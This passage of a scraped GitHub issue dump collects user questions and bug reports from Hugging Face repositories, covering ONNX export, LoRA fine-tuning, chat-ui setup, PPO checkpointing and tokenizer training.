Download: [8/30] -- ETA: 0:10:27\r\n2024-05-26T07:02:47.664710Z INFO text_generation_launcher: Download file: model-00009-of-00030.safetensors\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 
36 retries \r\nWarning: left.\r\n{\"t\":{\"$date\":\"2024-05-26T09:02:57.879+02:00\"},\"s\":\"I\", \"c\":\"WTCHKPT\", \"id\":22430, \"ctx\":\"Checkpointer\",\"msg\":\"WiredTiger message\",\"attr\":{\"message\":{\"ts_sec\":1716706977,\"ts_usec\":879791,\"thread\":\"8:0x7f4c6fd8f640\",\"session_name\":\"WT_SESSION.checkpoint\",\"category\":\"WT_VERB_CHECKPOINT_PROGRESS\",\"category_id\":6,\"verbose_level\":\"DEBUG_1\",\"verbose_level_id\":1,\"msg\":\"saving checkpoint snapshot min: 37, snapshot max: 37 snapshot count: 0, oldest timestamp: (0, 0) , meta checkpoint timestamp: (0, 0) base write gen: 1\"}}}\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 35 retries \r\nWarning: left.\r\n`\r\n\r\nplease help me out thanks\r\n\r\nand yes i've added ` HF_TOEKN ` secret too", "url": "https://github.com/huggingface/chat-ui/issues/1174", "state": "open", "labels": [ "support", "docker" ], "created_at": "2024-05-26T07:05:12Z", "updated_at": "2025-06-27T10:30:24Z", "comments": 5, "user": "starlord263" }, { "repo": "huggingface/optimum", "number": 1876, "title": "Unable to generate question-answering model for Llama and there is also no list of what are the supported models for question-answering", "body": "### Feature request\n\nHi, I received this error:\r\n\r\nValueError: Asked to export a llama model for the task question-answering, but the Optimum ONNX exporter only supports the tasks feature-extraction, feature-extraction-with-past, text-generation, text-generation-with-past, text-classification for llama. Please use a supported task. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the task question-answering to be supported in the ONNX export for llama.\r\n\r\nI was trying to generate an ONNX model for QuanAI/llama-2-7b-question-answering.\r\n\r\nI also tried to search for the supported question-answering models on https://huggingface.co/docs/optimum/exporters/onnx/usage_guides/export_a_model which had a broken link pointing to https://huggingface.co/exporters/task_manager (returns a 404). I am happy to consider other question-answering models instead of Llama if there is a list of what is available.\n\n### Motivation\n\nUnable to export Llama question-answering model\n\n### Your contribution\n\nNot sure how to contribute, I am a new user", "url": "https://github.com/huggingface/optimum/issues/1876", "state": "open", "labels": [ "bug", "onnx" ], "created_at": "2024-05-26T06:10:47Z", "updated_at": "2024-10-09T07:57:24Z", "user": "customautosys" }, { "repo": "huggingface/transformers.js", "number": 776, "title": "How to point to a specific model path in order to use compressed models? (brotli)", "body": "### Question\n\nHi, \r\n\r\nI just can't find the configuration to point to a specific model file path to use .onnx.br instead of .onnx for example. \r\n\r\nI can run the model (distilbert-base-cased-distilled-squad) offline without any issue and it works. But I want to deploy it compressed using brotli. All I can see in the config files is references to the folder of the model but not the actual file paths. 
\r\n\r\nE.g \"model_quantized.onnx\"\r\n\r\nAny help is appreciated.", "url": "https://github.com/huggingface/transformers.js/issues/776", "state": "open", "labels": [ "question" ], "created_at": "2024-05-24T18:31:12Z", "updated_at": "2024-05-25T10:24:25Z", "user": "KamilCSPS" }, { "repo": "huggingface/chat-ui", "number": 1169, "title": "Help debugging \"Sorry, something went wrong. Please try again.\"", "body": "I am a developer working on extending this project. Sometimes I get this error \"Sorry, something went wrong. Please try again.\" I can't figure out how to debug it when it happens. What I want is for it to display the full error somehow, like with a console.log. Is there some way to do that? Or is the error saved in the mongodb? This will help me a lot with debugging.", "url": "https://github.com/huggingface/chat-ui/issues/1169", "state": "closed", "labels": [], "created_at": "2024-05-24T18:30:08Z", "updated_at": "2024-06-17T12:47:03Z", "comments": 1, "user": "loganlebanoff" }, { "repo": "huggingface/datasets", "number": 6916, "title": "```push_to_hub()``` - Prevent Automatic Generation of Splits ", "body": "### Describe the bug\n\nI currently have a dataset which has not been splited. When pushing the dataset to my hugging face dataset repository, it is split into a testing and training set. How can I prevent the split from happening?\n\n### Steps to reproduce the bug\n\n1. Have a unsplit dataset \r\n\r\n```python\r\nDataset({ features: ['input', 'output', 'Attack', '__index_level_0__'], num_rows: 944685 })\r\n```\r\n\r\n2. Push it to huggingface\r\n\r\n```python\r\ndataset.push_to_hub(dataset_name)\r\n```\r\n\r\n3. On the hugging face dataset repo, the dataset then appears to be splited:\r\n\r\n![image](https://github.com/huggingface/datasets/assets/29337128/b4fbc141-42b0-4f49-98df-dd479648fe09)\r\n\r\n4. Indeed, when loading the dataset from this repo, the dataset is split in two testing and training set.\r\n\r\n```python\r\nfrom datasets import load_dataset, Dataset\r\n\r\ndataset = load_dataset(\"Jetlime/NF-CSE-CIC-IDS2018-v2\", streaming=True)\r\ndataset\r\n```\r\noutput: \r\n\r\n```\r\nIterableDatasetDict({\r\n train: IterableDataset({\r\n features: ['input', 'output', 'Attack', '__index_level_0__'],\r\n n_shards: 2\r\n })\r\n test: IterableDataset({\r\n features: ['input', 'output', 'Attack', '__index_level_0__'],\r\n n_shards: 1\r\n })\r\n```\n\n### Expected behavior\n\nThe dataset shall not be splited, as not requested.\n\n### Environment info\n\n- `datasets` version: 2.19.1\r\n- Platform: Linux-6.2.0-35-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.23.0\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.3.1", "url": "https://github.com/huggingface/datasets/issues/6916", "state": "closed", "labels": [], "created_at": "2024-05-22T23:52:15Z", "updated_at": "2024-05-23T00:07:53Z", "comments": 0, "user": "jetlime" }, { "repo": "huggingface/peft", "number": 1750, "title": "How to finetune embeddings and LM head as a single layer when they are tied?", "body": "I am looking to LoRA-finetune models like Gemma, which have tied embeddings.\r\nBut, I would also like to have the shared embeddings as trainable (the common embedding table corresponding to both input and output embeddings of the network).\r\n\r\nHow do I achieve this?\r\n\r\n---\r\n\r\n_Note:_ Passing both `[\"embed_tokens\",\"lm_head\"]` to `modules_to_save` will result in untying them, because PEFT will create separate tensor copies. 
Passing only `[\"embed_tokens\"]` will result in only the input embeddings being trainable (via a separate PEFT copy), while the output embeddings remain as they are (the original tensor).", "url": "https://github.com/huggingface/peft/issues/1750", "state": "closed", "labels": [], "created_at": "2024-05-21T18:32:07Z", "updated_at": "2025-08-12T11:54:09Z", "user": "GokulNC" }, { "repo": "huggingface/blog", "number": 2078, "title": "Idefics2's perceiver: how to set the attention mask to None?", "body": "I set the attention mask to None, but the model doesn't learn well. My inputs aren't padded, so I don't want an attention mask. How can I resolve this?\r\n\r\nI also tried adding an all-ones attention mask, but the result was also much worse.", "url": "https://github.com/huggingface/blog/issues/2078", "state": "open", "labels": [], "created_at": "2024-05-21T07:38:57Z", "updated_at": "2024-05-21T07:38:57Z", "user": "lucasjinreal" }, { "repo": "huggingface/peft", "number": 1749, "title": "How to fine-tune LoRA with HQQ?", "body": "### Feature request\n\nHow can I fine-tune with LoRA on an HQQ-quantized model?\n\n### Motivation\n\nHow can I fine-tune with LoRA on an HQQ-quantized model?\n\n### Your contribution\n\nHow can I fine-tune with LoRA on an HQQ-quantized model?", "url": "https://github.com/huggingface/peft/issues/1749", "state": "closed", "labels": [], "created_at": "2024-05-21T02:56:18Z", "updated_at": "2024-06-29T15:03:18Z", "user": "NickyDark1" }, { "repo": "huggingface/trl", "number": 1650, "title": "how to save v_head", "body": "Currently, I use `ppo_trainer.save_pretrained` to save a model that is still in training, because the machine I use is rather unstable, and I often need to resume training should it be interrupted. When I resume training I get the following warning:\r\n```\r\nWARNING:root:A model is loaded from 'RLGAF_gemma-7b-lima_sft_preprocessing_20epochs', and no v_head weight is found. This IS expected if you are not resuming PPO training.\r\n```\r\nI guess this is relevant to my case, since I need to resume PPO training. What is the proper way, then, to save a checkpoint of PPO training with the goal of resuming it later?", "url": "https://github.com/huggingface/trl/issues/1650", "state": "closed", "labels": [], "created_at": "2024-05-20T17:06:00Z", "updated_at": "2025-04-11T10:14:36Z", "user": "zyzhang1130" }, { "repo": "huggingface/chat-ui", "number": 1153, "title": "Can we use Hugging Face Chat with a Custom Server?", "body": "Requirement: \r\nI have a custom API which takes in input queries and passes them through a RAG pipeline and finally to an LLM, then returns the result. \r\n\r\nThe question is: can I integrate it with Chat-UI (utilizing just the chat-ui frontend and my custom backend)? If yes, is there any documentation around it? As per what I understood so far, it looks like it is possible, but I would have to make a lot of changes in the UI code itself to accommodate this. What I can see is that the UI is tightly coupled with text generation from models and doesn't fully support calling an API directly without code changes. \r\n\r\nAre there any docs for this?\r\n\r\nAlso, can we use any db other than mongodb?", "url": "https://github.com/huggingface/chat-ui/issues/1153", "state": "closed", "labels": [], "created_at": "2024-05-20T16:44:01Z", "updated_at": "2024-09-03T07:52:18Z", "comments": 9, "user": "snps-ravinu" }, { "repo": "huggingface/nanotron", "number": 176, "title": "Where is the \"nanotron format\" defined?", "body": "I see that any(?) 
hf model can be converted to nanotron format with this [script](https://github.com/huggingface/nanotron/blob/main/examples/llama/convert_hf_to_nanotron.py).\r\n\r\nIs there documentation describing this format?\r\n\r\nCan any model that may be loaded with AutoModelForCausalLM be converted to nanotron format for training?\r\n\r\n", "url": "https://github.com/huggingface/nanotron/issues/176", "state": "closed", "labels": [], "created_at": "2024-05-20T13:54:52Z", "updated_at": "2024-05-21T17:22:50Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/chat-ui", "number": 1151, "title": "Can I change localhost to remote IP?", "body": "I am running Chat-UI locally, but I want to change localhost to a remote IP. I am unable to find this configuration in the code. Can anyone help?", "url": "https://github.com/huggingface/chat-ui/issues/1151", "state": "closed", "labels": [], "created_at": "2024-05-20T05:34:23Z", "updated_at": "2024-05-20T07:01:30Z", "comments": 1, "user": "snps-ravinu" }, { "repo": "huggingface/candle", "number": 2197, "title": "How to slice a tensor?", "body": "tch has the function `slice` that returns a tensor slice. Is there a corresponding function for candle?", "url": "https://github.com/huggingface/candle/issues/2197", "state": "closed", "labels": [], "created_at": "2024-05-20T00:55:08Z", "updated_at": "2024-05-20T01:46:58Z", "user": "Gadersd" }, { "repo": "huggingface/tokenizers", "number": 1534, "title": "How to allow the merging of consecutive newline tokens \\n when training a byte-level BPE tokenizer?", "body": "Hello, I'm currently working on training a byte-level BPE tokenizer using the Huggingface tokenizers library. I've created a simple training script, a sample corpus, and provided the output produced by this script. My aim is to understand why consecutive newline tokens `\\n` are not being merged into a single token `\\n\\n` during the tokenization process. 
Below are the details:\r\n\r\n```python\r\nfrom tokenizers import (\r\n Tokenizer,\r\n pre_tokenizers,\r\n models,\r\n decoders,\r\n trainers,\r\n processors,\r\n)\r\n\r\nfiles = [\"demo_corpus.txt\"]\r\ntokenizer = Tokenizer(models.BPE())\r\ntokenizer.pre_tokenizer = pre_tokenizers.Sequence([\r\n pre_tokenizers.Digits(individual_digits=True),\r\n pre_tokenizers.ByteLevel(add_prefix_space=False, use_regex=True)\r\n])\r\ntokenizer.decoder = decoders.ByteLevel()\r\ntokenizer.post_processor = processors.ByteLevel()\r\n\r\ntrainer = trainers.BpeTrainer(\r\n initial_alphabet=pre_tokenizers.ByteLevel.alphabet(),\r\n vocab_size=2000,\r\n special_tokens=[\r\n \"\", \"<|beginoftext|>\", \"<|endoftext|>\"\r\n ]\r\n)\r\ntokenizer.train(files, trainer)\r\ntest_text = \"#include \\n\\n\\n\\n\\n\"\r\n\r\nprint(\"pre-tokenize spans:\", tokenizer.pre_tokenizer.pre_tokenize_str(test_text))\r\nids = tokenizer.encode(test_text).ids\r\nprint(f\"tokens: {[tokenizer.decode([tid]) for tid in ids]}\")\r\n```\r\n\r\ndemo_corpus.txt:\r\n```\r\n#include \r\n\r\n#include \r\n\r\n#include \r\n\r\nusing namespace std;\r\n\r\nint main(){\r\n int N, A[100000], p = 0;\r\n\r\n multiset S;\r\n\r\n scanf(\"%d\", &N);\r\n\r\n int p0 = 0, q0 = 1, q = N-1;\r\n\r\n vector result;\r\n\r\n for(int i: result)\r\n\r\n printf(\"%d\\n\", i);\r\n}\r\n```\r\n\r\noutput of training script:\r\n```\r\npre-tokenize spans: [('#', (0, 1)), ('include', (1, 8)), ('\u0120<', (8, 10)), ('set', (10, 13)), ('>', (13, 14)), ('\u010a\u010a\u010a\u010a\u010a', (14, 19))]\r\ntokens: ['#', 'include', ' <', 'set', '>', '\\n', '\\n', '\\n', '\\n', '\\n']\r\n```\r\n\r\nthe following is tokens produced by llama3 tokenizer:\r\n```python\r\ntokenizer = LlamaTokenizerFast.from_pretrained(\"my llama3 vocab path\")\r\ntest_text = \"#include \\n\\n\\n\\n\\n\"\r\nprint([tokenizer.decode([tid]) for tid in tokenizer(test_text)[\"input_ids\"]])\r\n\r\n# output\r\n# ['<|begin_of_text|>', '#include', ' <', 'set', '>\\n\\n\\n\\n\\n']\r\n```\r\n", "url": "https://github.com/huggingface/tokenizers/issues/1534", "state": "open", "labels": [ "bug" ], "created_at": "2024-05-18T03:11:35Z", "updated_at": "2025-07-07T09:34:16Z", "user": "liuslnlp" }, { "repo": "huggingface/transformers", "number": 30886, "title": "How to get the data seen by the model during training?", "body": "Hi! I haven't been able to find an answer to my question so opening an issue here. I'm fine-tuning the GPT-2 XL model using the trainer for 10 epochs and I'd like to save the data seen by the model during each epoch. More specifically, I want to save the data seen by the model every 242 steps. For instance, data seen from step 1 to step 242, step 243 to step 484, and so on until the end of the 10th epoch. I'm a bit confused about how to do this since the data is shuffled after each epoch. Is it possible to use `TrainerCallback` here?\r\n\r\nThese are my training args\r\n` training_args = TrainingArguments(\r\n f\"models/XL\",\r\n evaluation_strategy = \"steps\",\r\n learning_rate=2e-5,\r\n weight_decay=0.01,\r\n push_to_hub=False,\r\n num_train_epochs=10,\r\n per_device_train_batch_size=8, \r\n per_device_eval_batch_size=8, \r\n save_strategy=\"epoch\", \r\n save_steps = 242, \r\n fp16=True, \r\n report_to=\"none\", \r\n logging_strategy=\"steps\",\r\n logging_steps=100, \r\n )`\r\n \r\n I'd appreciate any directions. 
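One possible approach (a sketch, not a verified recipe — `TrainerCallback` hooks never see the batch contents, so this logs from the data collator instead; the `idx` column, the wrapper class, and the log file name are all hypothetical illustrations, not Trainer API):

```python
import json

from datasets import Dataset
from transformers import default_data_collator

class IndexLoggingCollator:
    """Append the dataset indices of every batch to a JSONL file."""
    def __init__(self, base_collator, log_path="seen_indices.jsonl"):
        self.base_collator = base_collator
        self.log_path = log_path

    def __call__(self, features):
        indices = [f.pop("idx") for f in features]  # strip before collating
        with open(self.log_path, "a") as fh:
            fh.write(json.dumps(indices) + "\n")
        return self.base_collator(features)

# Toy data; in the real run this is the tokenized training set.
ds = Dataset.from_dict({"input_ids": [[1, 2], [3, 4], [5, 6]]})
ds = ds.map(lambda ex, i: {"idx": i}, with_indices=True)

collator = IndexLoggingCollator(default_data_collator)
collator([ds[0], ds[1]])  # writes "[0, 1]" to seen_indices.jsonl
```

Passing `data_collator=collator` and the tagged dataset to `Trainer` should then leave one logged line per batch, which can be sliced into 242-step windows afterwards; note `remove_unused_columns=False` would be needed in `TrainingArguments` so the extra `idx` column survives until the collator.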
Thanks :) ", "url": "https://github.com/huggingface/transformers/issues/30886", "state": "closed", "labels": [], "created_at": "2024-05-17T21:32:50Z", "updated_at": "2024-05-20T17:26:29Z", "user": "jaydeepborkar" }, { "repo": "huggingface/optimum", "number": 1859, "title": "Improve inference time TrOCR", "body": "I have a fine-tuned TrOCR model, and I'm using \r\n`from optimum.onnxruntime import ORTModelForVision2Seq`.\r\nHow can I then make inference faster when someone makes a request to an API endpoint? I am already using async for handling multiple requests.", "url": "https://github.com/huggingface/optimum/issues/1859", "state": "closed", "labels": [ "question", "inference", "Stale" ], "created_at": "2024-05-16T13:31:53Z", "updated_at": "2024-12-18T02:06:21Z", "user": "CrasCris" }, { "repo": "huggingface/chat-ui", "number": 1148, "title": "Chat-ui Audit Logs", "body": "Hello,\r\n\r\nIs there a way to log the username, session ID, conversation ID, and the question that was sent in some type of log in chat-ui? Or just the username and the question?\r\n\r\nHow can we accomplish this?\r\n\r\nThanks", "url": "https://github.com/huggingface/chat-ui/issues/1148", "state": "open", "labels": [], "created_at": "2024-05-16T11:13:30Z", "updated_at": "2024-05-21T18:48:17Z", "comments": 5, "user": "Neb2653" }, { "repo": "huggingface/diffusers", "number": 7957, "title": "How to implement `IPAdapterAttnProcessor2_0` with xformers", "body": "I want to fine-tune the IP-Adapter model with xformers, but I did not find an xformers implementation corresponding to `IPAdapterAttnProcessor2_0`. I want to implement the attention processor in xformers; are the following two lines of code the only difference between the two versions?\r\n\r\nIn `XFormersAttnProcessor`:\r\n```python\r\nhidden_states = xformers.ops.memory_efficient_attention(\r\n query, key, value, attn_bias=attention_mask, op=self.attention_op, scale=attn.scale\r\n)\r\n```\r\n\r\nIn `AttnProcessor2_0`:\r\n```python\r\nhidden_states = F.scaled_dot_product_attention(\r\n query, key, value, attn_mask=attention_mask, dropout_p=0.0, is_causal=False\r\n)\r\n```", "url": "https://github.com/huggingface/diffusers/issues/7957", "state": "closed", "labels": [], "created_at": "2024-05-16T08:54:07Z", "updated_at": "2024-05-23T13:03:42Z", "user": "JWargrave" }, { "repo": "huggingface/OBELICS", "number": 12, "title": "How to use LDA for topic modeling", "body": "Thanks for your work again!\r\nIn the paper, the topic modeling of OBELICS is implemented using LDA, and I am wondering which specific LDA model was used, what settings were used to train it, and, most importantly, how the topics were derived from the keywords and weights (e.g., using LLMs)? Thank you for answering!", "url": "https://github.com/huggingface/OBELICS/issues/12", "state": "open", "labels": [], "created_at": "2024-05-16T03:56:29Z", "updated_at": "2024-06-11T16:27:12Z", "user": "jrryzh" }, { "repo": "huggingface/transformers.js", "number": 765, "title": "Can you use all transformers models with transformers.js?", "body": "### Question\r\n\r\nHi,\r\ncan you use [all transformers models](https://huggingface.co/models?library=transformers&sort=trending) (which seem to be listed under the python library) also in transformers.js? If yes, how so? Just download and provide the local path? 
I'm working in nodejs right now.\r\n\r\nFor example I'd like to use something like [Llama 3](https://huggingface.co/meta-llama/Meta-Llama-3-8B) with Transformers.js.\r\nIf that doesn't work, what would be the strongest general purpose LLM available for transformers.js right now (text generation, something like chatgpt, gemini, ...)?\r\n\r\nGreetings & thanks a lot!", "url": "https://github.com/huggingface/transformers.js/issues/765", "state": "open", "labels": [ "question" ], "created_at": "2024-05-15T19:35:28Z", "updated_at": "2024-05-15T21:21:57Z", "user": "Sir-hennihau" }, { "repo": "huggingface/datasets", "number": 6899, "title": "List of dictionary features get standardized", "body": "### Describe the bug\n\nHi, i\u2019m trying to create a HF dataset from a list using Dataset.from_list.\r\n\r\nEach sample in the list is a dict with the same keys (which will be my features). The values for each feature are a list of dictionaries, and each such dictionary has a different set of keys. However, the datasets library standardizes all dictionaries under a feature and adds all possible keys (with None value) from all the dictionaries under that feature.\r\n\r\nHow can I keep the same set of keys as in the original list for each dictionary under a feature?\n\n### Steps to reproduce the bug\n\n```\r\nfrom datasets import Dataset\r\n\r\n# Define a function to generate a sample with \"tools\" feature\r\ndef generate_sample():\r\n # Generate random sample data\r\n sample_data = {\r\n \"text\": \"Sample text\",\r\n \"feature_1\": []\r\n }\r\n \r\n # Add feature_1 with random keys for this sample\r\n feature_1 = [{\"key1\": \"value1\"}, {\"key2\": \"value2\"}] # Example feature_1 with random keys\r\n sample_data[\"feature_1\"].extend(feature_1)\r\n \r\n return sample_data\r\n\r\n# Generate multiple samples\r\nnum_samples = 10\r\nsamples = [generate_sample() for _ in range(num_samples)]\r\n\r\n# Create a Hugging Face Dataset\r\ndataset = Dataset.from_list(samples)\r\ndataset[0]\r\n```\r\n\r\n```{'text': 'Sample text', 'feature_1': [{'key1': 'value1', 'key2': None}, {'key1': None, 'key2': 'value2'}]}```\n\n### Expected behavior\n\n```{'text': 'Sample text', 'feature_1': [{'key1': 'value1'}, {'key2': 'value2'}]}```\n\n### Environment info\n\n- `datasets` version: 2.19.1\r\n- Platform: Linux-5.15.0-1040-nvidia-x86_64-with-glibc2.35\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.23.0\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 2.2.0\r\n- `fsspec` version: 2023.10.0", "url": "https://github.com/huggingface/datasets/issues/6899", "state": "open", "labels": [], "created_at": "2024-05-15T14:11:35Z", "updated_at": "2025-04-01T20:48:03Z", "comments": 2, "user": "sohamparikh" }, { "repo": "huggingface/transformers", "number": 30827, "title": "Using this command(optimum-cli export onnx --model Qwen1.5-0.5B-Chat --task text-generation Qwen1.5-0.5B-Chat_onnx/) to perform onnx transformation, it is found that the tensor type of the model becomes int64. 
How to solve this problem?", "body": "### System Info\n\ntransformers version : 4.38.1\r\nplatform: ubuntu 22.04\r\npython version : 3.10.14\r\noptimum version : 1.19.2\n\n### Who can help?\n\n@ArthurZucker and @younesbelkada\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1.reference conversion command link: https://huggingface.co/docs/transformers/v4.40.1/zh/serialization\r\n2.download model files offline (https://huggingface.co/Qwen/Qwen1.5-0.5B-Chat/tree/main)\r\n3.Execute transition instruction\uff1aoptimum-cli export onnx --model Qwen1.5-0.5B-Chat --task text-generation Qwen1.5-0.5B-Chat_onnx/\r\n\r\nThe conversion results are as follows\uff1a\r\n(mypy3.10_qnn) zhengjr@ubuntu-ThinkStation-P3-Tower:~$ optimum-cli export onnx --model Qwen1.5-0.5B-Chat --task text-generation Qwen1.5-0.5B-Chat_onnx/\r\n2024-05-15 19:42:07.726433: I tensorflow/core/platform/cpu_feature_guard.cc:193] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations: AVX2 AVX_VNNI FMA\r\nTo enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.\r\n2024-05-15 19:42:07.916257: I tensorflow/core/util/util.cc:169] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.\r\n2024-05-15 19:42:07.997974: E tensorflow/stream_executor/cuda/cuda_blas.cc:2981] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered\r\n2024-05-15 19:42:08.545959: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libnvinfer.so.7'; dlerror: libnvinfer.so.7: cannot open shared object file: No such file or directory\r\n2024-05-15 19:42:08.546100: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libnvinfer_plugin.so.7'; dlerror: libnvinfer_plugin.so.7: cannot open shared object file: No such file or directory\r\n2024-05-15 19:42:08.546104: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Cannot dlopen some TensorRT libraries. If you would like to use Nvidia GPU with TensorRT, please make sure the missing libraries mentioned above are installed properly.\r\nFramework not specified. Using pt to export the model.\r\nThe task `text-generation` was manually specified, and past key values will not be reused in the decoding. if needed, please pass `--task text-generation-with-past` to export using the past key values.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\nUsing the export variant default. 
Available variants are:\r\n - default: The default ONNX variant.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\n\r\n***** Exporting submodel 1/1: Qwen2ForCausalLM *****\r\nUsing framework PyTorch: 1.13.1\r\nOverriding 1 configuration item(s)\r\n\t- use_cache -> False\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/transformers/modeling_attn_mask_utils.py:114: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if (input_shape[-1] > 1 or self.sliding_window is not None) and self.is_causal:\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/optimum/exporters/onnx/model_patcher.py:300: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if past_key_values_length > 0:\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/transformers/models/qwen2/modeling_qwen2.py:126: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if seq_len > self.max_seq_len_cached:\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/transformers/models/qwen2/modeling_qwen2.py:290: TracerWarning: Converting a tensor to a Python boole", "url": "https://github.com/huggingface/transformers/issues/30827", "state": "closed", "labels": [], "created_at": "2024-05-15T12:45:50Z", "updated_at": "2024-06-26T08:04:10Z", "user": "JameslaoA" }, { "repo": "huggingface/chat-ui", "number": 1142, "title": "Feature request, local assistants", "body": "I experimented with a few assistants on HF.\r\nThe problem I am facing is that I don't know how to get the same behaviour I get on HF from local model (which is the same model).\r\nI tried everything I could thing of.\r\nI think HF does some filtering or rephrasing or has an additional prompt before the assistant description.\r\nPlease help.\r\nI am available for chat on discord https://discordapp.com/users/Zibri/", "url": "https://github.com/huggingface/chat-ui/issues/1142", "state": "open", "labels": [ "support" ], "created_at": "2024-05-15T11:11:29Z", "updated_at": "2024-05-27T06:53:21Z", "comments": 2, "user": "Zibri" }, { "repo": "huggingface/optimum", "number": 1855, "title": "how to change optimum temporary path ?", "body": "### Feature request\n\nc drive less space\n\n### Motivation\n\nhelp to solve many issue\n\n### Your contribution\n\ndont know ", "url": "https://github.com/huggingface/optimum/issues/1855", "state": "closed", "labels": [], "created_at": "2024-05-14T11:17:14Z", "updated_at": "2024-10-14T12:22:35Z", "user": "neonarc4" }, { "repo": "huggingface/optimum", "number": 1854, "title": "ai21labs/Jamba-tiny-random support", "body": "### Feature request\n\nai21labs/Jamba-tiny-random mode, is not supported by Optimum export.\r\n\r\nValueError: Trying to 
export a jamba model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type jamba to be supported natively in the ONNX export.\r\n\n\n### Motivation\n\nJamba is potentially very significant as it has a large context but a small size. This could be used in lots of scenarios if it has good performance.\n\n### Your contribution\n\nUnlikely I could do a PR as ONNX work is not my forte.", "url": "https://github.com/huggingface/optimum/issues/1854", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-05-14T10:22:05Z", "updated_at": "2024-10-09T09:10:58Z", "comments": 0, "user": "frankia312" }, { "repo": "huggingface/transformers.js", "number": 763, "title": "Have considered using wasm technology to implement this library? ", "body": "### Question\n\nHello, have you ever considered using wasm technology to implement this library? For example, rust's wgpu-rs and c++'s dawn are both implementations of webgpu. They can be converted to wasm and can also be accelerated with simd.", "url": "https://github.com/huggingface/transformers.js/issues/763", "state": "open", "labels": [ "question" ], "created_at": "2024-05-14T09:22:57Z", "updated_at": "2024-05-14T09:28:38Z", "user": "ghost" }, { "repo": "huggingface/trl", "number": 1643, "title": "How to save and resume a checkpoint from PPOTrainer", "body": "https://github.com/huggingface/trl/blob/5aeb752053876cce64f2164a178635db08d96158/trl/trainer/ppo_trainer.py#L203\r\nIt seems that every time the PPOTrainer is initialized, the accelerator is initialized as well. There's no API provided by PPOTrainer to resume checkpoints. How can we save and resume checkpoints?", "url": "https://github.com/huggingface/trl/issues/1643", "state": "closed", "labels": [], "created_at": "2024-05-14T09:10:40Z", "updated_at": "2024-08-08T12:44:25Z", "user": "paraGONG" }, { "repo": "huggingface/tokenizers", "number": 1531, "title": "How to Batch-Encode Paired Input Sentences with Tokenizers: Seeking Clarification", "body": "Hello.\r\n\r\nI'm using the tokenizer to encoding pair sentences in TemplateProcessing in batch_encode.\r\nThere's a confusing part where the method requires two lists for sentence A and sentence B.\r\n\r\nAccording to the [guide documentation](https://huggingface.co/docs/tokenizers/quicktour): \"To process a batch of sentences pairs, pass two lists to the Tokenizer.encode_batch method: the list of sentences A and the list of sentences B.\"\r\n\r\nSince it instructs to input two lists, it seems like [[A1, A2], [B1, B2]] --(encode)-> {A1, B1}, {A2, B2}.\r\n\r\nHowever, the actual input expects individual pairs batched, not splitting the sentence pairs into lists for A and B. 
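A quick sanity check of that pair format (a small sketch; the checkpoint is just an example):

```python
from tokenizers import Tokenizer

tokenizer = Tokenizer.from_pretrained("bert-base-uncased")

# One list whose items are (sentence_A, sentence_B) tuples --
# not two parallel lists of A-sentences and B-sentences:
encodings = tokenizer.encode_batch([("A1 text", "B1 text"), ("A2 text", "B2 text")])
print(len(encodings))         # 2, one encoding per pair
print(encodings[0].type_ids)  # 0s for the A segment, 1s for the B segment
```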
